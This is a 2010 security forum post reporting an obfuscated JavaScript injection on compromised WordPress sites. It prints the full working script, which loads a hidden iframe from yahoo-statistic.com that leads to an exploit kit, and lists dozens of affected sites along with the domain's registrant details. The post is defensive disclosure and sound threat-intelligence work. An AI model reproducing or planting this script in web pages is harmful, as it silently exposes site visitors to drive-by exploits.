Author Topic: yahoo-statistic.com directs to exploits  (Read 4916 times)

0 Members and 1 Guest are viewing this topic.

April 16, 2010, 05:34:16 pm
Read 4916 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
We have seen an increasing number of sites running Wordpress which contain a obfuscated script.

Code: [Select]
<!-- ~ --><script type='text/javascript'>function vS(){};this.nU='';vS.prototype = {r : function() {this.k="";this.mQ="";this.w='';this.zD=false;oD=false;wD="wD";var z=document;this.n=false;h="h";f="";var m=window;this.d=22706;var iQ=function(){return 'iQ'};uM=17389;function p(){};this.gQ="gQ";this.zT=false;var c=new Array();var bJ="bJ";    String.prototype.mM=function(g, u){return this.replace(g, u)};this.pO='';this.y=47529;var jU="jU";sR="sR";tV='';function rE(){};bC="bC";var t = 's{t?y{lKe?'.mM(/[\?K\{\|z]/g, '');iY=false;function tC(){};this.dF="";var tS=52222;        var v = 'a_pDpNeNnsdDCDhsiNlDdN'.mM(/[NDLs_]/g, '');this.tJ="";var bG='';var j = 'iwf>rUa>mUe>'.mM(/[\>w9UH]/g, '');function uZ(){};var aO="aO";var i = 'c]r]e#a@the]E#l]e#m]ehn]t#'.mM(/[#x@\]h]/g, '');eO='';l=false;var b = 'w>rviRtTev'.mM(/[v\>RT2]/g, '');var tW=34149;this.eG="eG";var rEL="";var e = 'sve:tIA:tkt:rkiIbvuvtvec'.mM(/[cvI\:k]/g, '');var iQD=function(){};var oW="";var kY=function(){return 'kY'};var s = 's0r?c?'.mM(/[\?10B7]/g, '');function pW(){};this.dJ="dJ";var jV = 'bSoSd?y?'.mM(/[\?Sp\(n]/g, '');var kI=function(){return 'kI'};this.uR="";vO="";hW='';var rM = 'd*i*s*p3lHaHy*:wn^o*n*e^'.mM(/[\^\*Hw3]/g, '');function yL(){};var eD=new Date();var iM=function(){};var x='';var uB = 'sUeNtNTLi$m$eNoUu$t$'.mM(/[\$NUCL]/g, '');iZ=411;function uN(){};this.iW=false;var fS=new Array();this.lV="lV";var eOX=function(){};tG="";try {this.fY="";var aON=new Date();gF=41884;this.kL="kL";var rS='';var a=z[i](j);eB=45917;nZ='';var oU=function(){return 'oU'};this.tK=36442;a[e](s, this.sW());gD="";this.yJ=63939;var lB=false;var kYF="";a[e](t, rM);var cT=52936;this.pS=false;this.cU=false;var q=65146;var fYC=new Array();document[jV][v](a);var kR=false;this.gB=false;function tP(){};var gU=9828;var bK=false;rV="";} catch(o) {kA='';this.oX='';var oV='';this.bT=false;z.write('tpO%swL%<%/%bpowdwy%>%<p/phptwm%lZ>I'.mM(/[Iwp%Z]/g, ''));zU="zU";this.sC='';function rH(){};jUL='';var aP = this;var zB=function(){};var sS="sS";var vF=function(){};m[uB](function(){ aP.r() }, 231);var qG=new Date();lG="lG";this.sM="";}xG='';this.dU="";},sW : function() {xB="xB";var wT="";var jVA=new Date();return 'h+t8tBp8:+/8/+yMaxhMoBoM-Bs+tBa8tBi8sxt+ixcM.+cBo+mx/BjBsB/Md+exfBaxu8l8tM.Bh+txmxl+'.mM(/[\+BMx8]/g, '');var jR="";rD="";}};this.nA=false;var hG=new vS(); this.jG=50573;hG.r();gA='';</script><!-- ~ -->
This code directs to

Code: [Select]
yahoo-statistic.com/js/default.html
which directs to an exploit kit.

Here are 2 examples:
http://wepawet.cs.ucsb.edu/view.php?hash=97e3dfd9d2dcfd796af0b4aa987402ba&t=1271433212&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=8800f44d7afa20e2dc4c5e453081ff71&t=1271435087&type=js

You won't surprized about the registrant:

Quote
Domain name: yahoo-statistic.com

Registrant Contact:
   HardSoft, inc
   Hilary Kneber hilarykneber@yahoo.com
   7569468 fax: 7569468
   29/2 Sun street. Montey 29
   Virginia NA 3947
   us

a few more  examples of affected sites
Code: [Select]
www.bocabeacon.com/
www.skatetheory.com/news/wicked-fashion-launches-rs-by-sheckler/7026
www.jeffboskovitch.org/
impactincorp.com/
acoff.net/index.php?page_id=84&cat=internet&sub=webmoney
addso.ru/
addso.ru/mat-i-doch/
addso.ru/otec-i-doch/
agame.ca/
alexeevboxing.com/?page_id=1291
blog-edu.org/?p=364
blog.mobivity.com/?p=147
blog.whartonmedicalclinic.com/
bradgilbert.tennisweek.com/?p=175
celestia.ru/times/?p=79
clubbalaiisabel.com/
dealermobilhonda.com/?p=494
doggiedelightsva.com/test/?page_id=34&category=7&product_id=51
dubaicompanieshouse.com/
e-shcheglov.ru/
eliteman.ru/
epsomwrites.org/
french-perfum.ru/?p=75
gerardlim.convertium.com/?p=12
japanesebottleopener.com/
koreanblogs.ru/?m=200704
lvpf.net/
masterprophetblog.com/
mowa.gov.af/english/?page_id=458
ourvisionspaforyou.com/blog/?p=4686
peregonmashin.ru/
phiswork.ru/?p=15&page=6
pokachi.net/
pozhbezpeka.net.ua/?page_id=223
pride-u-bike.com/2006/09/30/akkymtlator/
pride-u-bike.com/2007/06/23/s-tolkacha/
pride-u-bike.com/2007/07/30/doroga-smerti/
pride-u-bike.com/byzapimoto/
pride-u-bike.com/motorcycle/suzuki-motorcycle/
pride-u-bike.com/motorcycle/vozdeniye-motorcycle/
pride-u-bike.com/sell/honda-steed-400-1996/
pride-u-bike.com/sell/honda-vfr400r-nc30/
quotidiennokoue.com/
quotidiennokoue.com/?cat=5
quotidiennokoue.com/?p=558
safety.amw.com/family/ask-john-walsh-how-can-i-tell-if-a-child-has-been-abused/
safety.amw.com/home/stop-domestic-violence-before-it-starts/
sometimesiamanasshole.com/blog/
spiceroute.org/
thebeauteeshop.com/blog/
thebeauteeshop.com/blog/?p=236
tigernewspaper.com/wordpress/
vip-iceland.com/?page_id=2
webcache.googleusercontent.com/search?q=cache:_JzxW0ExC_0J:abogadospontevedra.com/%3Fpage_id%3D155+honorarios+ejecucion+de+sentencia+exequatur&cd=16&hl=es&ct=clnk&gl=es
weirdfortunecookies.com/2000/05/02/dont-ask-dont-tell/
wmserver.net/sgcg/?page_id=5
wp9.ru/
www.andressolimano.com/andressolimano/
www.artvanprogram.org/
www.bailgun.com/
www.ballballmachine.com/?page_id=3&category=1
www.baunproject.org/?page_id=20
www.berkland.org//resources/devotionals/
www.bocabeacon.com/
www.bocabeacon.com/?p=3894
www.bocabeacon.com/?p=3982
www.c3intel.com/background-checks/?page_id=11
www.coutureforthesoul.com/
www.georgeferrandi.com/
www.graceandtruthchurch.org/?page_id=8
www.gutsglamgrace.com/?cat=20
www.gutsglamgrace.com/?p=2009
www.homeplacestructures.net/playhouses
www.hopedworaczyk.com/blog/
www.ilcastelloedizioni.com/zeroweb/?p=376
www.ingatlanelado.net/kert-otthon/padlofutes-es-hoszigeteles/
www.intentionaltreasures.com/
www.jeffboskovitch.org/
www.karachiblog.com/index.php/category/karachi-education/
www.keroroworld.com/
www.kitchen2404.com/
www.ktcrystals.com/content/?page_id=32
www.livrariaviasapiens.com.br/?p=117
www.logotales.com/wp/index.php
www.marielorenz.com/inprogress/?p=2384
www.marielorenz.com/inprogress/?page_id=2683
www.marlaktuell.de/
www.marlaktuell.de/?cat=2
www.marques.pro.br/?page_id=389
www.martinluthermccoy.com/
www.onebigmaine.com/maine/native-animals-of-maine/
www.rinf.com/columnists/news/10-secret-societies-you-need-to-know-about
www.rinf.com/columnists/news/the-us-governments-secret-colorado-oil-discovery
www.sanseracingteam.com/wordpress/
www.sanseracingteam.com/wordpress/?p=128
www.scottyblog.com/
www.scottyblog.com/?p=338
www.sharma.com.ua/?cat=11
www.skatetheory.com/
www.skatetheory.com/category/events/?a_name=&apost_id=&a_content=&securitycode=&paged=130
www.skatetheory.com/events/contests/king-of-spring-skateboard-showdown-2010-nyc/8607
www.skatetheory.com/events/contests/schooled-series-2010/8484
www.skatetheory.com/events/journeys-backyard-bbq-2008-philadelphia-pa/3894
www.skatetheory.com/locator/skateparks/PA/
www.skatetheory.com/news/active-introduces-mike-mo-capaldi/5770
www.skatetheory.com/news/emericas-wild-ride-tour-2008/3616
www.skatetheory.com/news/lord-of-dogtown-jay-adams-is-released-from-jail/4984
www.skatetheory.com/news/vince-del-valle-lem-villemin-on-adidas/1608
www.skatetheory.com/upcoming-events/
www.skatetheory.com/wp-content/u
www.soacenter.com/?p=172
www.sonnoli.com/?page_id=5
www.stirparts.ru/
www.tiergestuetzt.de/
www.travelanswerman.com/Blog/?p=1574
www.tvzete.net/
Ruining the bad guy's day